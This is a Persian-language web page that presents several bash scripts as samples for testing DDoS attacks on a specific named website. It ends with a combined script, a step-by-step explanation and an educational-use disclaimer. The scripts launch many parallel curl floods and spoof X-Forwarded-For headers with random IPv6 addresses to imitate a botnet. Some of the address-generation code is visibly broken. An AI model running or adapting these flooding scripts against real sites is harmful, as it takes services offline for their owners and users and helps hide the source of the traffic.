نمونه کد نویسی و برنامه سازی برای تست حملات انکار سرویس توزیع شده DDOS


#!/bin/bash

# تنظیم URL وب سایت مورد نظر
url="https://miralishahidi.ir/"

# تنظیم تعداد درخواست ها در هر ثانیه
pps=100

# تنظیم مدت زمان حمله (بر حسب ثانیه)
duration=10

# تابع برای ارسال درخواست های HTTP GET
function attack() {
 while true; do
  curl -s "$url" &>/dev/null
 done
}

# شروع حمله
echo "[!] حمله DDOS داینامیک به $url در حال شروع..."

# اجرای حمله در چندین فرآیند جداگانه برای افزایش پهنای باند
for i in $(seq 1 $pps); do
 attack &
done

# صبر کردن به مدت زمان تعیین شده
sleep $duration

# متوقف کردن حمله
echo "[!] حمله DDOS داینامیک متوقف شد."

# Kill all child processes
pkill -P $$

#!/bin/bash

# تنظیم URL وب سایت مورد نظر
url="https://miralishahidi.ir/"

# تنظیم تعداد درخواست ها در هر ثانیه
pps=100

# تنظیم مدت زمان حمله (بر حسب ثانیه)
duration=10

# تابع برای تولید رنج IP ورژن 6 تصادفی
function generate_random_ipv6() {
 local prefix="2001:db8::/32"
 local random_number=$((RANDOM % (2**32 - 1)))
 echo "${prefix}${random_number:x}"
}

# تابع برای ارسال درخواست های HTTP GET
function attack() {
 while true; do
  local ip=$(generate_random_ipv6)
  curl -s -H "X-Forwarded-For: $ip" "$url" &>/dev/null
 done
}

# شروع حمله
echo "[!] حمله DDOS داینامیک به $url با رنج IP ورژن 6 در حال شروع..."

# اجرای حمله در چندین فرآیند جداگانه برای افزایش پهنای باند
for i in $(seq 1 $pps); do
 attack &
done

# صبر کردن به مدت زمان تعیین شده
sleep $duration

# متوقف کردن حمله
echo "[!] حمله DDOS داینامیک متوقف شد."

# Kill all child processes
pkill -P $$

#!/bin/bash

# تنظیم URL وب سایت مورد نظر
url="https://miralishahidi.ir/"

# تنظیم تعداد درخواست ها در هر ثانیه
pps=100

# تنظیم مدت زمان حمله (بر حسب ثانیه)
duration=60

# تابع برای تولید رنج IP ورژن 6 تصادفی
function generate_random_ipv6() {
 local prefix="2001:db8::/32"
 local random_number=$((RANDOM % (2**32 - 1)))
 echo "${prefix}${random_number:x}"
}

# تابع برای ارسال درخواست های HTTP GET
function attack() {
 while true; do
  local ip=$(generate_random_ipv6)
  curl -s -H "X-Forwarded-For: $ip" "$url" &>/dev/null
 done
}

# شروع حمله
echo "[!] حمله بات‌نت به $url با رنج IP ورژن 6 در حال شروع..."

# ایجاد لیست IP های تصادفی
ips=()
for i in $(seq 1 $((pps * duration))); do
 ips+=($(generate_random_ipv6))
done

# اجرای حمله در چندین فرآیند جداگانه برای افزایش پهنای باند
for i in $(seq 1 $pps); do
 (
  for ip in "${ips[@]}"; do
   curl -s -H "X-Forwarded-For: $ip" "$url" &>/dev/null
  done
 ) &
done

# صبر کردن به مدت زمان تعیین شده
sleep $duration

# متوقف کردن حمله
echo "[!] حمله بات‌نت متوقف شد."

# Kill all child processes
pkill -P $$

#!/bin/bash

# تنظیم URL وب سایت مورد نظر
url="https://miralishahidi.ir/"

# تنظیم تعداد درخواست ها در هر ثانیه
pps=100

# تنظیم مدت زمان حمله (بر حسب ثانیه)
duration=60

# تابع برای تولید رنج IP ورژن 6 تصادفی
function generate_random_ipv6() {
 local prefix="2001:db8::/32"
 local random_number=$((RANDOM % (2**32 - 1)))
 echo "${prefix}${random_number:x}"
}

# تابع برای ارسال درخواست های HTTP GET
function attack() {
 local ip=$(generate_random_ipv6)
 curl -s -H "X-Forwarded-For: $ip" "$url" &>/dev/null
}

# شروع حمله
echo "[!] حمله بات‌نت به $url با رنج IP ورژن 6 در حال شروع..."

# ایجاد لیست IP های تصادفی
ips=()
for i in $(seq 1 $((pps * duration))); do
 ips+=($(generate_random_ipv6))
done

# ارسال درخواست ها به صورت موازی
for ip in "${ips[@]}"; do
 curl -s -H "X-Forwarded-For: $ip" "$url" &>/dev/null
done

# صبر کردن به مدت زمان تعیین شده
sleep $duration

# متوقف کردن حمله
echo "[!] حمله بات‌نت متوقف شد."

# Kill all child processes
pkill -P $$

ترکیب چندین تکنیک از این اسکریپت‌ها به یک کد جامع‌تر می‌تواند شامل تولید آدرس‌های IP ورژن 6 تصادفی، ارسال درخواست‌های HTTP GET به صورت موازی و تنظیم پارامترهای حمله مانند URL، تعداد درخواست‌ها در هر ثانیه و مدت زمان حمله باشد. در ادامه، یک نمونه کد ترکیبی ارائه شده است:


```bash
#!/bin/bash

# تنظیم URL وب سایت مورد نظر
url="https://miralishahidi.ir/"

# تنظیم تعداد درخواست‌ها در هر ثانیه
pps=100

# تنظیم مدت زمان حمله (بر حسب ثانیه)
duration=60

# تابع برای تولید رنج IP ورژن 6 تصادفی
function generate_random_ipv6() {
 local prefix="2001:db8::/32"
 local random_number=$((RANDOM % (2**32)))
 printf "%s%08x\n" "$prefix" "$random_number"
}

# تابع برای ارسال درخواست‌های HTTP GET
function attack() {
 while true; do
  local ip=$(generate_random_ipv6)
  curl -s -H "X-Forwarded-For: $ip" "$url" &>/dev/null
 done
}

# شروع حمله
echo "[!] حمله ترکیبی DDOS به $url با رنج IP ورژن 6 در حال شروع..."

# ایجاد و اجرای چندین فرآیند حمله برای افزایش پهنای باند
for i in $(seq 1 $pps); do
 attack &
done

# صبر کردن به مدت زمان تعیین شده
sleep $duration

# متوقف کردن حمله
echo "[!] حمله ترکیبی DDOS متوقف شد."

# متوقف کردن تمام فرآیندهای فرزند
pkill -P $$

```

توضیحات کد:
1. تنظیمات اولیه:
URL هدف، تعداد درخواست‌ها در هر ثانیه (pps) و مدت زمان حمله (duration) تنظیم می‌شوند.

2. تابع تولید آدرس‌های IP تصادفی:
این تابع یک آدرس IP ورژن 6 تصادفی با استفاده از یک پیشوند ثابت تولید می‌کند.

3. تابع ارسال درخواست‌های HTTP GET:
این تابع به صورت بی‌نهایت درخواست‌های HTTP GET را به URL هدف ارسال می‌کند، هر بار با استفاده از یک آدرس IP تصادفی.

4. شروع حمله:
فرآیندهای موازی برای ارسال درخواست‌ها ایجاد و اجرا می‌شوند.

5. صبر به مدت زمان تعیین شده و توقف حمله:
پس از مدت زمان مشخص، تمام فرآیندهای فرزند متوقف می‌شوند.

هشدار مهم:
این کد برای اهداف آموزشی و فهم تکنیک‌ها نوشته شده است. استفاده از این کد برای انجام حملات DDoS غیرقانونی و غیراخلاقی است و می‌تواند عواقب جدی قانونی به دنبال داشته باشد. از این کد فقط در محیط‌های آزمایشگاهی و با رضایت صریح همه طرف‌های ذی‌نفع استفاده کنید.

 1. ورود به صفحه فارسی